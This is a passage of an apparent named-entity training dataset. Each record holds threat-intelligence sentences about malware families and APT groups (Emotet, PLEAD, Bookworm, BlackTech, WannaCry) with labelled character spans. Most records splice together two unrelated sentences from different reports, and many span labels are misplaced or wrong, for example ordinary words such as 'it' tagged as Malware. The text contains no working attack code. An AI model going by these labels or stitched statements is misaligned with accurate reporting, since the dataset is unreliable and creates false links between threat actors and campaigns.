262, "end": 273, "label": "Malware"}, {"start": 278, "end": 287, "label": "Malware"}]} {"text": "The Ham Backdoor functions primarily as a modular platform , which provides the attacker with the ability to directly download additional modules and execute them in memory from the command and control ( C2 ) server . 
Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 118, "end": 145, "label": "Malware"}, {"start": 218, "end": 225, "label": "Malware"}]} {"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 46, "end": 52, "label": "System"}, {"start": 166, "end": 172, "label": "System"}, {"start": 199, "end": 212, "label": "Malware"}, {"start": 215, "end": 235, "label": "Malware"}, {"start": 238, "end": 248, "label": "Malware"}, {"start": 251, "end": 262, "label": "Malware"}, {"start": 269, "end": 273, "label": "Malware"}, {"start": 346, "end": 349, "label": "System"}]} {"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . 
Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 162, "end": 168, "label": "System"}, {"start": 195, "end": 208, "label": "Malware"}, {"start": 211, "end": 231, "label": "Malware"}, {"start": 234, "end": 244, "label": "Malware"}, {"start": 247, "end": 258, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}]} {"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations .", "spans": [{"start": 164, "end": 183, "label": "Organization"}]} {"text": "DanaBot is a Trojan that includes banking site web injections and stealer functions . PLEAD uses spear-phishing emails to deliver and install their backdoor , either as an attachment or through links to cloud storage services .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 13, "end": 19, "label": "System"}, {"start": 34, "end": 61, "label": "Malware"}, {"start": 66, "end": 83, "label": "Malware"}, {"start": 112, "end": 118, "label": "System"}, {"start": 203, "end": 225, "label": "Malware"}]} {"text": "Two binder tools \u2014 used to disguise custom executables as legitimate Microsoft implants \u2014 were discovered by Falcon Intelligence and linked to MYTHIC LEOPARD in July 2017 . 
PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": [{"start": 27, "end": 54, "label": "Malware"}, {"start": 69, "end": 78, "label": "Organization"}, {"start": 109, "end": 128, "label": "Organization"}, {"start": 143, "end": 157, "label": "Organization"}, {"start": 267, "end": 274, "label": "Vulnerability"}, {"start": 281, "end": 286, "label": "System"}, {"start": 303, "end": 316, "label": "Vulnerability"}]} {"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability in Microsoft Internet Information Services ( IIS ) 6.0 , to compromise the victim 's server .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 79, "end": 98, "label": "Malware"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 194, "end": 223, "label": "System"}, {"start": 226, "end": 229, "label": "System"}]} {"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . 
This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from .", "spans": [{"start": 49, "end": 62, "label": "Malware"}, {"start": 192, "end": 210, "label": "Malware"}, {"start": 214, "end": 232, "label": "Malware"}]} {"text": "This isn\u2019t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries .", "spans": [{"start": 26, "end": 28, "label": "Malware"}, {"start": 111, "end": 137, "label": "Malware"}, {"start": 142, "end": 162, "label": "Malware"}, {"start": 192, "end": 211, "label": "Organization"}, {"start": 216, "end": 238, "label": "Organization"}, {"start": 250, "end": 261, "label": "Organization"}, {"start": 269, "end": 289, "label": "Organization"}, {"start": 292, "end": 300, "label": "Organization"}, {"start": 303, "end": 313, "label": "Organization"}, {"start": 320, "end": 340, "label": "Organization"}]} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 191, "end": 216, "label": "Malware"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 229, "end": 235, "label": "Malware"}, {"start": 242, "end": 246, "label": "Malware"}]} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 214, "end": 220, "label": "System"}, {"start": 270, "end": 284, "label": "Malware"}, {"start": 304, "end": 319, "label": "Indicator"}]} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 199, "end": 203, "label": "Malware"}, {"start": 237, "end": 244, "label": "Malware"}, {"start": 249, "end": 255, "label": "Malware"}]} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 165, "end": 170, "label": "Malware"}, {"start": 175, "end": 181, "label": "Malware"}]} {"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors . Recently , the JPCERT published a thorough analysis of the Plead backdoor , which , according to Trend Micro , is used by the cyberespionage group BlackTech .", "spans": [{"start": 5, "end": 11, "label": "Organization"}, {"start": 16, "end": 31, "label": "Malware"}, {"start": 92, "end": 110, "label": "System"}, {"start": 128, "end": 134, "label": "Organization"}, {"start": 172, "end": 186, "label": "Malware"}, {"start": 210, "end": 221, "label": "Organization"}]} {"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools .", "spans": [{"start": 49, "end": 62, "label": "Malware"}, {"start": 192, "end": 210, "label": "Malware"}, {"start": 214, "end": 232, "label": "Malware"}]} {"text": "Hot patching is an operating system-supported feature for installing updates without having to reboot or restart a process . 
The BlackTech group is primarily focused on cyberespionage in Asia .", "spans": [{"start": 19, "end": 53, "label": "System"}, {"start": 58, "end": 76, "label": "Malware"}]} {"text": "Until this incident , no malware had been discovered misusing the AMT SOL feature for communication . The new activity described in this blogpost was detected by ESET in Taiwan , where the Plead malware has always been most actively deployed .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 162, "end": 166, "label": "Organization"}, {"start": 189, "end": 194, "label": "Malware"}, {"start": 195, "end": 202, "label": "Malware"}]} {"text": "The folders seem to contain information about the company 's development documentation , artificial intelligence model , web security software , and antivirus software base code . Attackers are targeting Windows platform and aiming at government institutions as well as big companies in Colombia .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 20, "end": 39, "label": "Malware"}, {"start": 204, "end": 211, "label": "System"}, {"start": 235, "end": 258, "label": "Organization"}]} {"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files . Attackers like to use spear-phishing email with password protected RAR attachment to avoid being detected by the email gateway .", "spans": [{"start": 20, "end": 26, "label": "System"}, {"start": 30, "end": 34, "label": "System"}, {"start": 45, "end": 49, "label": "System"}, {"start": 84, "end": 87, "label": "System"}, {"start": 107, "end": 110, "label": "System"}, {"start": 127, "end": 140, "label": "Malware"}, {"start": 209, "end": 212, "label": "Malware"}]} {"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails . 
The first sample being captured was in April 2018 and since that we observed a lot more related ones .", "spans": [{"start": 103, "end": 139, "label": "Malware"}]} {"text": "This isn\u2019t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . After performing investigations on the classified victims , we find the attacker targets big companies and government agencies in Colombia .", "spans": [{"start": 26, "end": 28, "label": "Malware"}, {"start": 111, "end": 137, "label": "Malware"}, {"start": 142, "end": 162, "label": "Malware"}, {"start": 272, "end": 291, "label": "Organization"}]} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 155, "end": 185, "label": "Organization"}, {"start": 214, "end": 220, "label": "System"}, {"start": 241, "end": 260, "label": "Organization"}, {"start": 263, "end": 285, "label": "Organization"}, {"start": 296, "end": 307, "label": "Organization"}]} {"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . The oldest sample we've seen up to now is from November 2013 .", "spans": [{"start": 4, "end": 20, "label": "Malware"}, {"start": 50, "end": 63, "label": "Malware"}]} {"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . 
One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on .", "spans": [{"start": 15, "end": 22, "label": "Malware"}, {"start": 36, "end": 49, "label": "Malware"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 125, "end": 132, "label": "Malware"}, {"start": 186, "end": 201, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 264, "end": 283, "label": "Organization"}, {"start": 286, "end": 303, "label": "Organization"}, {"start": 306, "end": 328, "label": "Organization"}, {"start": 331, "end": 343, "label": "Organization"}, {"start": 346, "end": 351, "label": "Organization"}, {"start": 354, "end": 372, "label": "Organization"}, {"start": 375, "end": 381, "label": "Organization"}]} {"text": "They also download apks secretly and record audios and videos , then upload users\u2019 privacy information to server , causing users\u2019 privacy leakage . However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 10, "end": 18, "label": "Malware"}, {"start": 24, "end": 32, "label": "Malware"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 69, "end": 75, "label": "Malware"}, {"start": 238, "end": 250, "label": "Malware"}]} {"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . 
Originally , the main infection vector of Blue Termite was spear-phishing emails .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 106, "end": 120, "label": "Malware"}, {"start": 121, "end": 130, "label": "Malware"}, {"start": 188, "end": 196, "label": "Organization"}, {"start": 303, "end": 315, "label": "Malware"}, {"start": 335, "end": 341, "label": "System"}]} {"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 18, "end": 37, "label": "Malware"}, {"start": 252, "end": 265, "label": "Organization"}, {"start": 348, "end": 353, "label": "System"}, {"start": 354, "end": 361, "label": "Vulnerability"}, {"start": 364, "end": 377, "label": "Vulnerability"}]} {"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 129, "end": 142, "label": "Organization"}]} {"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . 
In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 .", "spans": [{"start": 17, "end": 35, "label": "Malware"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 136, "end": 149, "label": "Organization"}]} {"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures .", "spans": [{"start": 0, "end": 18, "label": "Malware"}, {"start": 59, "end": 67, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 128, "end": 145, "label": "Malware"}, {"start": 182, "end": 197, "label": "Malware"}, {"start": 288, "end": 303, "label": "Organization"}]} {"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 90, "end": 115, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 133, "end": 152, "label": "Malware"}, {"start": 155, "end": 172, "label": "Malware"}, {"start": 175, "end": 198, "label": "Malware"}, {"start": 221, "end": 224, "label": "Malware"}, {"start": 240, "end": 243, "label": "Malware"}]} {"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . 
In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 18, "end": 47, "label": "Malware"}, {"start": 50, "end": 59, "label": "Malware"}, {"start": 64, "end": 75, "label": "Malware"}, {"start": 91, "end": 100, "label": "Malware"}, {"start": 181, "end": 194, "label": "Organization"}]} {"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 43, "end": 48, "label": "Malware"}, {"start": 144, "end": 152, "label": "Malware"}, {"start": 200, "end": 205, "label": "Malware"}, {"start": 289, "end": 296, "label": "Organization"}]} {"text": "The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 149, "end": 159, "label": "Malware"}, {"start": 202, "end": 210, "label": "Malware"}]} {"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less\u201d aspect of this method . 
The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks .", "spans": [{"start": 8, "end": 15, "label": "Malware"}, {"start": 27, "end": 34, "label": "Malware"}, {"start": 129, "end": 134, "label": "Malware"}, {"start": 135, "end": 142, "label": "Malware"}, {"start": 148, "end": 156, "label": "Malware"}, {"start": 178, "end": 189, "label": "Organization"}]} {"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 53, "end": 61, "label": "Malware"}, {"start": 173, "end": 176, "label": "Malware"}, {"start": 246, "end": 261, "label": "Malware"}]} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 131, "end": 152, "label": "Malware"}, {"start": 182, "end": 201, "label": "Malware"}, {"start": 230, "end": 245, "label": "Malware"}, {"start": 249, "end": 279, "label": "Malware"}]} {"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . 
The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 40, "end": 54, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 174, "end": 193, "label": "Malware"}, {"start": 244, "end": 247, "label": "System"}, {"start": 255, "end": 265, "label": "Indicator"}, {"start": 283, "end": 293, "label": "Indicator"}]} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . targeted attacks .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}]} {"text": "The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets . Using XREFs during static analysis is a common technique to quickly find where functions of interest are called .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 52, "end": 71, "label": "Malware"}, {"start": 106, "end": 116, "label": "System"}, {"start": 220, "end": 225, "label": "Malware"}]} {"text": "The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system . 
The developers designed Bookworm to be a modular Trojan not limited to just the initial architecture of the Trojan , as Bookworm can also load additional modules provided by the C2 server .", "spans": [{"start": 48, "end": 51, "label": "System"}, {"start": 60, "end": 92, "label": "Malware"}, {"start": 188, "end": 196, "label": "Malware"}, {"start": 205, "end": 219, "label": "Malware"}, {"start": 272, "end": 278, "label": "Malware"}, {"start": 284, "end": 292, "label": "Malware"}, {"start": 342, "end": 344, "label": "System"}]} {"text": "The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant . Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server .", "spans": [{"start": 4, "end": 33, "label": "System"}, {"start": 53, "end": 87, "label": "Malware"}, {"start": 117, "end": 125, "label": "Malware"}, {"start": 173, "end": 181, "label": "Malware"}, {"start": 336, "end": 342, "label": "Malware"}, {"start": 378, "end": 380, "label": "System"}]} {"text": "These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures . While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand .", "spans": [{"start": 82, "end": 117, "label": "Malware"}, {"start": 126, "end": 148, "label": "Malware"}, {"start": 262, "end": 270, "label": "Malware"}, {"start": 324, "end": 332, "label": "Malware"}]} {"text": "The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine . 
Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server .", "spans": [{"start": 42, "end": 48, "label": "System"}, {"start": 102, "end": 117, "label": "Malware"}, {"start": 150, "end": 158, "label": "Malware"}, {"start": 267, "end": 269, "label": "System"}]} {"text": "DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server . The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 114, "end": 135, "label": "Malware"}, {"start": 170, "end": 178, "label": "Malware"}, {"start": 322, "end": 324, "label": "System"}]} {"text": "The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet . Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 26, "end": 33, "label": "Organization"}, {"start": 165, "end": 206, "label": "Organization"}, {"start": 293, "end": 300, "label": "Organization"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 363, "end": 371, "label": "Malware"}]} {"text": "Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable . 
Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": [{"start": 38, "end": 73, "label": "Malware"}, {"start": 151, "end": 157, "label": "Malware"}, {"start": 161, "end": 169, "label": "Malware"}, {"start": 227, "end": 233, "label": "Malware"}, {"start": 265, "end": 269, "label": "Indicator"}]} {"text": "This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans . The developers of Bookworm use these modules in a rather unique way , as the other embedded DLLs provide API functions for Leader to carry out its tasks .", "spans": [{"start": 29, "end": 40, "label": "Malware"}, {"start": 138, "end": 146, "label": "Malware"}, {"start": 243, "end": 249, "label": "Malware"}]} {"text": "FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors . Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand .", "spans": [{"start": 0, "end": 9, "label": "System"}, {"start": 20, "end": 36, "label": "Malware"}, {"start": 64, "end": 84, "label": "System"}, {"start": 165, "end": 184, "label": "Organization"}, {"start": 187, "end": 194, "label": "Organization"}, {"start": 254, "end": 270, "label": "Malware"}, {"start": 339, "end": 349, "label": "Organization"}]} {"text": "As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories . 
We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" .", "spans": [{"start": 5, "end": 20, "label": "System"}, {"start": 23, "end": 30, "label": "System"}, {"start": 68, "end": 96, "label": "Malware"}, {"start": 99, "end": 129, "label": "Malware"}, {"start": 132, "end": 143, "label": "Malware"}, {"start": 148, "end": 163, "label": "Malware"}, {"start": 166, "end": 184, "label": "Malware"}, {"start": 187, "end": 208, "label": "Malware"}, {"start": 215, "end": 234, "label": "Malware"}, {"start": 280, "end": 288, "label": "Malware"}, {"start": 375, "end": 391, "label": "Indicator"}, {"start": 420, "end": 438, "label": "Malware"}, {"start": 458, "end": 460, "label": "System"}]} {"text": "RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . We believe that it is likely threat actors will continue development Bookworm , and will continue to use it for the foreseeable future .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 37, "end": 70, "label": "Malware"}, {"start": 83, "end": 109, "label": "System"}, {"start": 122, "end": 131, "label": "System"}, {"start": 238, "end": 246, "label": "Malware"}]} {"text": "These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections . 
Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand .", "spans": [{"start": 35, "end": 43, "label": "Malware"}, {"start": 48, "end": 63, "label": "Malware"}, {"start": 66, "end": 79, "label": "Malware"}, {"start": 84, "end": 105, "label": "Malware"}, {"start": 108, "end": 112, "label": "System"}, {"start": 117, "end": 147, "label": "Malware"}, {"start": 166, "end": 197, "label": "Malware"}, {"start": 204, "end": 233, "label": "Malware"}, {"start": 295, "end": 303, "label": "Malware"}]} {"text": "The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities . Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand .", "spans": [{"start": 4, "end": 20, "label": "System"}, {"start": 68, "end": 101, "label": "Malware"}, {"start": 127, "end": 138, "label": "Malware"}, {"start": 180, "end": 183, "label": "System"}, {"start": 268, "end": 287, "label": "Malware"}]} {"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 47, "end": 52, "label": "Malware"}, {"start": 65, "end": 100, "label": "Malware"}, {"start": 207, "end": 215, "label": "Malware"}, {"start": 222, "end": 228, "label": "Malware"}, {"start": 263, "end": 265, "label": "System"}]} {"text": "WCry uses a combination of the RSA and AES algorithms to encrypt files . 
We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 31, "end": 34, "label": "System"}, {"start": 39, "end": 42, "label": "System"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 116, "end": 125, "label": "Malware"}, {"start": 281, "end": 287, "label": "Malware"}]} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 97, "end": 118, "label": "Indicator"}, {"start": 129, "end": 144, "label": "Malware"}]} {"text": "Depending on placement , a web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement . A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting .", "spans": [{"start": 41, "end": 65, "label": "Malware"}, {"start": 94, "end": 118, "label": "Malware"}, {"start": 125, "end": 152, "label": "Malware"}, {"start": 157, "end": 163, "label": "Malware"}, {"start": 198, "end": 200, "label": "System"}, {"start": 290, "end": 296, "label": "Malware"}]} {"text": "While it lacks more advanced functionality like screen capturing , it is still able to carry out most tasks desired by threat actors : exfiltration of files , ability to download and execute additional payloads , and gain remote shell access . 
Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier .", "spans": [{"start": 119, "end": 132, "label": "Organization"}, {"start": 135, "end": 156, "label": "Malware"}, {"start": 170, "end": 178, "label": "Malware"}, {"start": 183, "end": 210, "label": "Malware"}, {"start": 217, "end": 241, "label": "Malware"}, {"start": 279, "end": 290, "label": "Indicator"}, {"start": 308, "end": 318, "label": "Indicator"}, {"start": 364, "end": 372, "label": "Malware"}]} {"text": "To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information .", "spans": [{"start": 54, "end": 68, "label": "Malware"}, {"start": 127, "end": 156, "label": "Malware"}, {"start": 175, "end": 191, "label": "Malware"}]} {"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": [{"start": 28, "end": 41, "label": "System"}, {"start": 125, "end": 148, "label": "Malware"}, {"start": 179, "end": 202, "label": "Malware"}, {"start": 227, "end": 249, "label": "System"}, {"start": 260, "end": 275, "label": "Indicator"}]} {"text": "DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor . 
